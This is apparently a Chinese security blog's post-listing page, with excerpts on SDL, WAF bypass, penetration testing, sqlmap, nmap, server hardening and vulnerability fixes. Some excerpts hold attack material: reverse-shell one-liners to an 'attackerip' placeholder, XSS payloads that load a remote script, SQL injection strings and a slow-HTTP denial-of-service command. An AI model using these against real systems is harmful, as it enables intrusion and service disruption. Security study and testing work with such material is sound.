企业信息安全-优快云博客

转载安全开发生命周期（SDL）

安全开发生命周期（SDL）是一个帮助开发人员构建更安全的软件和解决安全合规要求的同时降低开发成本的软件开发过程。安全应用从安全设计开始，软件的安全问题很大一部分是由于不安全的设计而引入的，微软用多年的经验总结出了安全开发生命周期（SDL），并提出了攻击面最小化、STRIDE威胁建模等多种方法辅助安全人员对软件进行安全设计。安全设计对于软件安全的重要性尤为可见。一、安全开发生命周期（SDL）是什么？SDL介绍安全开发生命周期（SDL）即Security Development Lifecyc

2021-12-02 10:42:10 7923

转载 XSS现代WAF规则探测及绕过技术

初始测试1、使用无害的payload，类似<b>,<i>,<u>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤<>等等；2、如果过滤闭合标签，尝试无闭合标签的payload（<b,<i,<marquee）观察响应；3、尝试以下的payload<script>alert(1);</script><script>prompt(1);</script><

2020-09-28 09:17:06 728

原创反弹shell与生成shell

反弹shell0x01 bash 版本：bash -i >& /dev/tcp/attackerip/1234 0>&1注意这个是由解析 shell 的 bash 完成，所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。0x02 nc 版本：支持 - e 选项nc -e /bin/sh attackerip 1234这个方式最...

2019-12-04 19:44:06 998

转载详细的渗透思路（转Mr-xn）

信息收集服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等）网站指纹识别（包括，cms，cdn，证书等），dns记录 whois信息，姓名，备案，邮箱，电话反查（邮箱丢社工库，社工准备等）子域名收集，旁站，C段等 google hacking针对化搜索，pdf文件，中间件版本，弱口令扫描等扫描网站目录结构，爆后台，网站ba...

2019-10-06 20:26:59 5623

原创常用的Linux命令

如下是一份 Linux 机器的渗透测试备忘录，是在后期开发期间或者执行命令注入等操作时的一些典型命令，设计为测试人员进行本地枚举检查之用。命令描述 netstat -tulpn 在 Linux 中显示对应了进程ID（PID）的网络端口。 watch ss -stplu 通过套接字实时观察 TCP, UDP 端口。 lsof -i 显示确认了的连接。...

2019-10-05 08:34:59 292

转载 XSS 绕过waf 姿势

https://www.cnblogs.com/wintrysec/p/10874980.html1.使用无害的payload，类似<b>,<i>,<u>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤<>等等；2.如果过滤闭合标签，尝试无闭合标签的payload（<b,<i,<marque...

2019-06-25 16:48:02 2184 1

转载 ModSecurity规则

中文译文参考：http://netsecurity.51cto.com/art/201407/446264.htm英文原文参考：http://resources.infosecinstitute.com/configuring-modsecurity-firewall-owasp-rules/根据最新实践调整里面的细节内容，图片内容未调整：0x00 背景ModSecurity...

2019-05-04 08:26:42 5873

转载 nmap常用命令以及脚本

转载自：http://www.4hou.com/technology/10481.html还有freebuf系列的文章都挺好https://www.cnblogs.com/MacoLee/articles/5714165.html4种常用的扫描1.nmap -sP 1.1.1.1/24探测C段存活主机，可以用 |grep up 过滤存活的主机2. nmap -sS 1.1....

2019-04-15 00:53:14 3833

转载 sql注入payload

分享一些平时测试用的sql payloads1：BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...

2019-04-12 15:12:50 3993

转载 sqlmap命令3

当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候，它会：1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择，读取哪些数据sqlmap支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。2、...

2019-04-11 09:59:19 1181

转载 sqlmap命令2

sqlmap简介sqlmap支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 4、联合查询注入，可以使用union的情况下的注入。 5、堆查询...

2019-04-11 09:57:16 906

转载 sqlmap命令

cookie注入：sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入：sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...

2019-04-11 09:51:22 1558

转载渗透测试工具实战技巧合集

最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略# 主机发现，生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现，发现大部分常用端口#...

2019-03-23 11:05:16 996

原创分享国外安全团队及工具

名称版描述主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....

2019-03-19 15:15:43 16234

转载人物-携程凌云

冬日的上午，安在CEO张耀疆和我在上海凌空SOHO携程办公区，见到了携程信息安全高级总监凌云。初见凌云，清瘦的身形，秀气的容貌，还有一嗓子洪亮的话音，完全是一个二十多岁的小伙子。然而出乎我意料的是，凌云说他已经在奔四的道路上一去不复返，着实吓了我一跳。他又笑称可能他天性乐观，所以岁月这把杀猪刀在他脸上留了情。我看也是，乐观的人，连时间都能对他柔情万种。 ...

2019-01-18 11:23:34 1462

转载常规服务器安全检测备忘录

安全检查项推荐工具 Nginx配置安全 gixy Nginx目录权限检查手工 Apache日志安全检测 apache-scalp PHP配置文件安全检测 pcc 主机安全审计 lynis rootkit木马检查 chkrootkit;rootkit hunter 系统用户排查手工,注意高权限和无需密码账号线上代...

2018-12-27 14:13:15 387

转载安全测试CheckList

权限系统保证全部资源都使用HTTPS 登出之后销毁会话ID 密码重置后需要销毁所有活跃会话使用httponly Cookies 密码找回等无需登录的场景下下达到用户认证字符串必须是该场景单独使用的,须确保无法在其他任何场景完成认证敏感场景,如下但不限于:登录,注册,发表话题等,是否存在验证码,验证码强度是否足够,验证码接口是否安全,若无验证码,是否有频率限制或其他人机验证方式 ...

2018-12-27 14:11:23 898

转载安全信息守则

1.Do 规范1.1 General Security 通用安全条目执行人负责人被访者应确保访客在前台登记访客信息,并在办公区域内需有人全程陪同前台;相关对接人员行政跟进只有在得到IT人员的授权后,访客携带的电脑,手机才能连入公司网络前台;相关对接技术负责任;运维技术部行政跟进公共wifi由IT运维部跟进工作相关的任...

2018-12-27 13:17:57 561

转载论安全的“闭环“和KPI

最近发现了一个怪现象甲方做安全的,总是有人会搞一堆看起来很高大上的东西,或者就是一堆没有落地的,没有闭环的安全产品,或是拿改一改的开源产品,但是自己也不清楚一些指标或是具体的使用细节的产品.比如,挂着各种头衔的产品在换了关键人物之后便处于弃用状态, 或者总喜欢做一些当前很难落地或者根本也不考虑能否落地的东西,这些产品大多会用到机器学习等,还会有一个酷炫的名字.然鹅最核心的指标,安全能力,或...

2018-12-27 13:14:31 1209

转载关于安全产品的“联动”

最近一直在做NIDS,已有雏形,甚是欣慰,但是还是有很多问题.NIDS的本质是通过流量中发现异常行为,可能是明显的webshell通讯,恶意软件通讯,可能是奇奇怪怪的对外/对内连接.在这个层面上的确可以发现非加密的各种安全问题,但是我们会发现一些NIDS本身很难优化的地方.1.发现了异常连接(如DB Server主动的对外HTTP请求,且该Web Server非公司资产)2.发现了外部...

2018-12-27 12:56:42 1155

转载 [转]《绿盟科技2017Techworld—大型互联网安全实践》观后感

今天看了绿盟科技2017Techworld—大型互联网安全实践，美团点评的赵彦大牛的演讲，看的我是激动不已，因为在看这个视频之前，在今年3，4月份，我就一直在思考，绝对的安全是什么样子的，太多的思路和想法都和这个视频完全一样，虽然没有赵大那么高的高度，但是还是非常激动，也许这种纵深防御体系的思路正如赵大所说，十几年前就有了，可是对于我这个安全从业时间不到一年的小白来说，可是独立思考出来的概念和名词...

2018-12-27 12:46:05 412

转载 [转]Web服务器加固思路

1.权限控制，低权限，只读2.屏蔽IP，使用一些威胁情报更新自己的IP黑名单列表3.封杀各种user-agent，防止恶意爬虫，漏扫等4.封杀特定的url，入bak，sh，sql等5.强制网站使用域名访问6.url 参数过滤敏感字,如../，union等7.关闭版本号显示8.自定义错误页面，关闭报错信息9.Cookie添加HttpOnly属性10.tomcat可以设置关闭war自...

2018-12-27 12:37:26 1026

转载 [转]点融开源AgentSmith HIDS 一套轻量级的HIDS系统

文|陈越我们将该项目开源，希望可以帮助到广大的信息安全团队来建设和完善自己的HIDS体系，也希望大家能够支持并共同维护这个还处于刚起步阶段的项目。项目地址：https://github.com/DianrongSecurity/AgentSmith-HIDS HIDS要解决的问题 HIDS(Host-based Intrusion Detection S...

2018-12-27 12:16:02 2417

转载【转载】安全知识小记

Posted on 2017-08-29 | In security | 1.关于PHP文件包含如果php.ini的配置选项allow_url_fopen和allow_url_include为ON的话，则文件包含函数是可以加载远程文件的。在Web服务器安全配置方面可以通过设定php.ini中open_basedir的值将允许包含的文件限定在某一特定目录内，这样可以有效避免利用文件包含漏...

2018-12-27 11:41:36 446

转载 [转载]乙方产品“痛点”思考

年初进入一家乙方安全公司，一进来就进入“小黑屋”开始参与PRS的研发工作。从一名初创公司的“全栈”转到安全研究和安全开发，也有了很多思考。安全产品也没有真实使用过太多，仅从其他很多讨论和场景进行我的一些思考。1.乙方公司缺乏真实数据，仅这一点，从出发点可能就会遗漏，忽视很多重要的思路，全靠自己“脑补”，无论是产品还是背后的逻辑。2.产品严重依赖正则等规则，一来难以维护，大多都是拿来就用，有...

2018-12-27 11:00:58 544

原创 ImportError: No module named six.moves.queue

pip install awscli --upgrade --ignore-installed six

2018-11-28 21:53:10 3330

转载 Struts2-045漏洞批量扫描工具

一个 Struts2-045漏洞批量扫描工具https://github.com/lijiejie/struts2_045_scanRequirements 1 2 pip install requests Usage 1 2 3 4 5 6 7 8 9...

2018-11-23 16:36:49 2827

转载 IIS短文件名暴力枚举漏洞利用工具(IIS shortname Scanner)

上文我已经介绍了IIS短文件名暴力枚举漏洞的成因和利用。这里只是发出昨天写的脚本。脚本可以测试对应的URL是否存在漏洞，若存在漏洞，则猜解文件夹下所有的短文件名：包括文件和文件名。网上早前已经有公开的工具了：https://code.google.com/p/iis-shortname-scanner-poc/我没有参考他的代码。自己用python实现了一个漏洞利用脚本。简单测试，...

2018-11-23 16:35:55 14731 1

转载 .DS_Store文件泄漏利用工具: ds_store_exp

https://github.com/lijiejie/ds_store_exp .DS_Store是Mac下Finder用来保存如何展示文件/文件夹的数据文件，每个文件夹下对应一个。如果开发/设计人员将.DS_Store上传部署到线上环境，可能造成文件目录结构泄漏，特别是备份文件、源代码文件。ds_store_exp 是一个.DS_Store 文件泄漏利用脚本，它解析.DS_...

2018-11-23 16:34:43 8558 2

原创系统漏洞及修复汇总

仅供参考 DNS域传送漏洞漏洞描述：网站DNS服务器配置不当，使得攻击者可获取DNS数据库的详细信息，导致所有域名DNS泄露，从而引起进一步的入侵。DNS主备之间的数据同步就会用到dns域传送，但如果配置不当，就会导致任何匿名用户都可以获取DNS服务器某一域的所有记录，将整个企业的基础业务以及网络架构对外暴露从而造成严重的信息泄露，甚至导致企业网络被渗透。漏洞测试：如dns...

2018-11-23 16:12:32 3023

原创 WEB应用漏洞及修复汇总

仅供参考 1.SQL注入风险等级：高危漏洞描述：SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验，即没有进行有效地特殊字符过滤，导致网站服务器存在安全风险，这就是SQL Injection，即SQL注入漏洞。漏洞危害：机密数据被窃取；核心业务数据被篡改；网页被篡改；数据库所在服务器被攻击从而变为傀儡主机，导致局域网(内网)...

2018-11-23 16:08:48 1803

原创中间件漏洞及修复汇总

仅供参考 Nginx文件解析漏洞漏洞等级：高危漏洞描述：nginx文件解析漏洞产生的原因是网站中间键版本过低，可将任意文件当作php可执行文件来执行，可导致攻击者执行恶意代码来控制服务器。漏洞危害：机密数据被窃取；核心业务数据被篡改；网页被篡改；数据库所在服务器被攻击变为傀儡主机，导致局域网(内网)被入侵。修复方案：升级中间件版本...

2018-11-23 15:59:06 1257

原创安全连接失败

ESET和NOD32安全产品如果你用的是 ESET 安全产品，比如 NOD32 反病毒软件或 ESET 网络安全，请关闭以下设置，然后再打开该设置——这样也许会有助于消除该故障。启用应用协议内容过滤器启用 SSL/TLS 协议过滤器...

2018-11-12 18:19:34 951

原创 slowhttptest 慢速攻击

apt-get install slowhttptest slowhttptest -hslowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://www.xxx.com/index.html -x 24 -p 3slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 819...

2018-10-12 16:35:31 1228

原创 kali 搜狗输入法

1.搜狗1）.首先修改依赖源deb http://cn.archive.ubuntu.com/ubuntu/ trusty main restricted universe multiversedeb http://cn.archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiversedeb htt...

2018-10-09 14:07:19 435

转载 HTTP 学习指南

前言关于计算机网络，HTTP网络通信协议在任何的开发工作中都非常重要今天，我将献上一份HTTP的学习指南，希望你们会喜欢目录1. 储备知识讲解HTPP协议前，先了解一些基础的计算机网络相关知识1.1 计算机网络体系结构定义计算机网络的各层 + 其协议的集合作用定义该计算机网络的所能完成的功能结构介绍计算机网络体系结构分为3...

2018-10-04 17:56:37 144

转载 HTTP307状态码

301永久重定向302临时重定向，HTTP1.0的状态码，HTTP1.1也有保留。如果client向server发送post请求。 server返回URL和302。如果用户确认，client发送post请求。（但实际情况是，很多浏览器都不问问用户，直接变为get发送get请求）303临时重定向，HTTP1.1的状态码// 发送Post请求，收到303，直接重定向为get，发送g...

2018-10-04 17:56:28 3312

转载 HTTP协议的请求方法

前言：从来没想过要写关于http协议请求方式的，可是今天遇到一位同事，竟然对HTTP的请求方式一点都不了解，所以决定总结一下，也记录一下。 HTTP协议（Hyper Text Transfer Protocol）HTTP是一个基于TCP/IP通信协议来传递数据，包括html文件、图像、结果等，即是一个客户端和服务器端请求和应答的标准。 HTTP协议特点1.http无连接：...

2018-10-04 17:56:22 800 1

转载 MySQL基于布尔型盲注常用语句

什么是盲注？基于布尔型SQL盲注即在SQL注入过程中，应用程序仅仅返回True（页面）和False（页面）。这时，我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断（比较大小）来得到我们需要的信息。常用语句汇总查询所有数据库1.判断表存不存在 1 and exists(select ...

2018-10-04 17:55:51 2475

原创百个XSS-payload注入汇总

(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javasc...

2018-10-04 17:55:30 3721 1

空空如也

空空如也